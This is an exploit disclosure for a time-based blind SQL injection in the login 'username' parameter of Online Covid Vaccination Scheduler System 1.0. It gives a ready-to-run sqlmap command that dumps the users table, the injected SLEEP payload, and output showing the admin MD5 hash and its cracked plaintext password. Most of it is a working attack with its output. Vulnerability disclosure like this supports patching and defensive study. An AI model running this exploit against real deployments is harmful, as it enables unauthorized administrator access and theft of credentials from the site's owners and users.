# Exploit Title: Online Covid Vaccination Scheduler System 1.0 - 'username' time-based blind SQL Injection # Date: 2021-07-07 # Exploit Author: faisalfs10x (https://github.com/faisalfs10x) # Vendor Homepage: https://www.sourcecodester.com/ # Software Link: https://www.sourcecodester.com/sites/default/files/download/oretnom23/scheduler.zip # Version: 1.0 # Tested on: Windows 10, XAMPP ################ # Description # ################ The admin panel login can be assessed at http://{ip}/scheduler/admin/login.php. The username parameter is vulnerable to time-based SQL injection. Upon successful dumping the admin password hash, we can decrypt and obtain the plain-text password. Hence, we could authenticate as Administrator. ########### # PoC # ########### Run sqlmap to dump username and password: $ sqlmap -u "http://localhost/scheduler/classes/Login.php?f=login" --data="username=admin&password=blabla" --cookie="PHPSESSID=n3to3djqetf42c2e7l257kspi5" --batch --answers="crack=N,dict=N,continue=Y,quit=N" -D scheduler -T users -C username,password --dump ########### # Output # ########### Parameter: username (POST) Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: username=admin' AND (SELECT 7551 FROM (SELECT(SLEEP(5)))QOUn) AND 'MOUZ'='MOUZ&password=blabla Vector: AND (SELECT [RANDNUM] FROM (SELECT(SLEEP([SLEEPTIME]-(IF([INFERENCE],0,[SLEEPTIME])))))[RANDSTR]) web server operating system: Windows web application technology: PHP 5.6.24, Apache 2.4.23 back-end DBMS: MySQL >= 5.0.12 (MariaDB fork) current database: 'scheduler' Database: scheduler Table: users [1 entry] +----------+----------------------------------+ | username | password | +----------+----------------------------------+ | admin | 0192023a7bbd73250516f069df18b500 | +----------+----------------------------------+ The password is based on PHP md5() function. So, MD5 reverse for 0192023a7bbd73250516f069df18b500 is admin123